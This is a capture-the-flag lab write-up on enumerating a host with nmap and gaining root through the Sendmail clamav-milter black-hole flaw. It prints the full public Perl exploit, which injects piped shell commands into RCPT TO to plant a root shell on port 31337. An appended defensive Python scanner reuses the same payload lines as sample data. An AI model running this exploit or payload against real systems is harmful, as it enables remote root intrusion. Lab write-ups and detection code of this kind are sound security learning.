This practice lab was meant to test your ability to enumerate thoroughly and exploit a known vulnerability in the ClamAV (surprise!) filter for SMTP.
The first thing I started with was an nmap scan using scripts, version enumeration, and output into a file.
sudo nmap -sCV -p- -oN nmap/clam 192.168.227.42

Results:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.8.1p1 Debian 8.sarge.6 (protocol 2.0)
| ssh-hostkey:
| 1024 30:3e:a4:13:5f:9a:32:c0:8e:46:eb:26:b3:5e:ee:6d (DSA)
|_ 1024 af:a2:49:3e:d8:f2:26:12:4a:a0:b5:ee:62:76:b0:18 (RSA)
25/tcp open smtp Sendmail 8.13.4/8.13.4/Debian-3sarge3
| smtp-commands: localhost.localdomain Hello [192.168.45.165], pleased to meet you, ENHANCEDSTATUSCODES, PIPELINING, EXPN, VERB, 8BITMIME, SIZE, DSN, ETRN, DELIVERBY, HELP
|_ 2.0.0 This is sendmail version 8.13.4 2.0.0 Topics: 2.0.0 HELO EHLO MAIL RCPT DATA 2.0.0 RSET NOOP QUIT HELP VRFY 2.0.0 EXPN VERB ETRN DSN AUTH 2.0.0 STARTTLS 2.0.0 For more info use "HELP <topic>". 2.0.0 To report bugs in the implementation send email to 2.0.0 sendmail-bugs@sendmail.org. 2.0.0 For local information send email to Postmaster at your site. 2.0.0 End of HELP info
80/tcp open http Apache httpd 1.3.33 ((Debian GNU/Linux))
|_http-server-header: Apache/1.3.33 (Debian GNU/Linux)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Ph33r
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
199/tcp open smux Linux SNMP multiplexer
445/tcp open netbios-ssn Samba smbd 3.0.14a-Debian (workgroup: WORKGROUP)
60000/tcp open ssh OpenSSH 3.8.1p1 Debian 8.sarge.6 (protocol 2.0)
| ssh-hostkey:
| 1024 30:3e:a4:13:5f:9a:32:c0:8e:46:eb:26:b3:5e:ee:6d (DSA)
|_ 1024 af:a2:49:3e:d8:f2:26:12:4a:a0:b5:ee:62:76:b0:18 (RSA)
Service Info: Host: localhost.localdomain; OSs: Linux, Unix; CPE: cpe:/o:linux:linux_kernel

First, I note the versions of SSH, SMTP, and HTTP. Since port 80 is open, I am automatically drawn to the website. My web enumeration is as follows:
1. whatweb: I love this tool, a command-line web app analyzer, and it's colorful :)

2. View the website

Ahh yes, binary! So the first thing I do when I see this is to open CyberChef.

It is clear to me now that I need to pwn this machine; I will not tolerate this. However, this also probably means the foothold is not in the web application. After doing some research, I learned that ClamAV is an SNMP service. To identify its use, I ran another nmap scan, this time a UDP port scan.
sudo nmap -sU 192.168.227.42

The results are numerous, so I decided to only highlight the services that caught my eye.

Port 161 lists clamav-milter, running in black hole mode. ClamAV is antivirus software, and exploit PoCs have been written for it because its poor input sanitization allows remote code execution.
After digging, I found a few exploits:

The one at the very bottom matches the current stack perfectly.
Analyzing the code below, I learned that the exploit appends a new line to the server's configuration file and opens a backdoor on port 31337 that provides a root shell to whoever connects.
### black-hole.pl
### Sendmail w/ clamav-milter Remote Root Exploit
### Copyright (c) 2007 Eliteboy
########################################################
use IO::Socket;
print "Sendmail w/ clamav-milter Remote Root Exploit\n";
print "Copyright (C) 2007 Eliteboy\n";
if ($#ARGV != 0) {print "Give me a host to connect.\n";exit;}
print "Attacking $ARGV[0]...\n";
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                              PeerPort => '25',
                              Proto    => 'tcp');
print $sock "ehlo you\r\n";
print $sock "mail from: <>\r\n";
print $sock "rcpt to: <nobody+\"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf\"@localhost>\r\n";
print $sock "rcpt to: <nobody+\"|/etc/init.d/inetd restart\"@localhost>\r\n";
print $sock "data\r\n.\r\nquit\r\n";
while (<$sock>) {
print;
}
# milw0rm.com [2007-12-21]

Perfect, executing the public exploit looks like this:

Then, netcat into the port:

Perfect, now we have root access. I am not a n00b :D
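From the defender's side, the exploit above leaves two things to look for: a RCPT TO whose quoted local part starts with a pipe (the string a vulnerable clamav-milter in black hole mode hands to the shell), and the extra line it plants in /etc/inetd.conf. The Python below is an added example, not code from the original post or from the exploit's author; the SMTP transcript and inetd.conf excerpt it scans are constructed, and the function names are mine.

```python
import re

# Constructed SMTP transcript, as a defender might capture it on the wire or
# find in a milter debug log. The two long RCPT lines mirror the pattern the
# public black-hole.pl exploit sends; the other recipients are normal.
SAMPLE_SESSION = [
    "ehlo you",
    "mail from: <>",
    "rcpt to: <alice@localhost>",
    "rcpt to: <nobody+\"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf\"@localhost>",
    "rcpt to: <nobody+\"|/etc/init.d/inetd restart\"@localhost>",
    "rcpt to: <bob+newsletter@localhost>",
    "data",
]

RCPT_RE = re.compile(r"^\s*rcpt\s+to\s*:\s*<(?P<addr>.*)>\s*$", re.IGNORECASE)
SHELL_META = re.compile(r"[|;`$<>]")   # characters a mailbox name never needs

def is_suspicious_rcpt(line):
    """Classify one SMTP command line; returns (flagged, reason)."""
    m = RCPT_RE.match(line)
    if not m:
        return False, "not a RCPT TO command"
    local_part = m.group("addr").rsplit("@", 1)[0]   # text before the last '@'
    if re.search(r'"\s*\|', local_part):             # quoted local part piping to a command
        return True, "pipe-to-command in quoted local part"
    if SHELL_META.search(local_part):
        return True, "shell metacharacter in local part"
    return False, "ok"

def scan_session(lines):
    """Return (line, reason) for every command that looks like an injection attempt."""
    hits = []
    for ln in lines:
        flagged, why = is_suspicious_rcpt(ln)
        if flagged:
            hits.append((ln, why))
    return hits

# Constructed /etc/inetd.conf excerpt; the last entry is what the exploit appends.
SAMPLE_INETD = """\
#<service_name> <sock_type> <proto> <flags> <user> <server_path> <args>
ftp stream tcp nowait root /usr/sbin/tcpd /usr/sbin/in.ftpd
31337 stream tcp nowait root /bin/sh -i
"""

def audit_inetd(text):
    """Return inetd.conf entries that run a shell directly as the server program."""
    hits = []
    for ln in text.splitlines():
        fields = ln.split()
        if ln.lstrip().startswith("#") or len(fields) < 6:
            continue
        user, server = fields[4], fields[5]
        if re.search(r"/(ba)?sh$", server) and user == "root":
            hits.append(ln)
    return hits
```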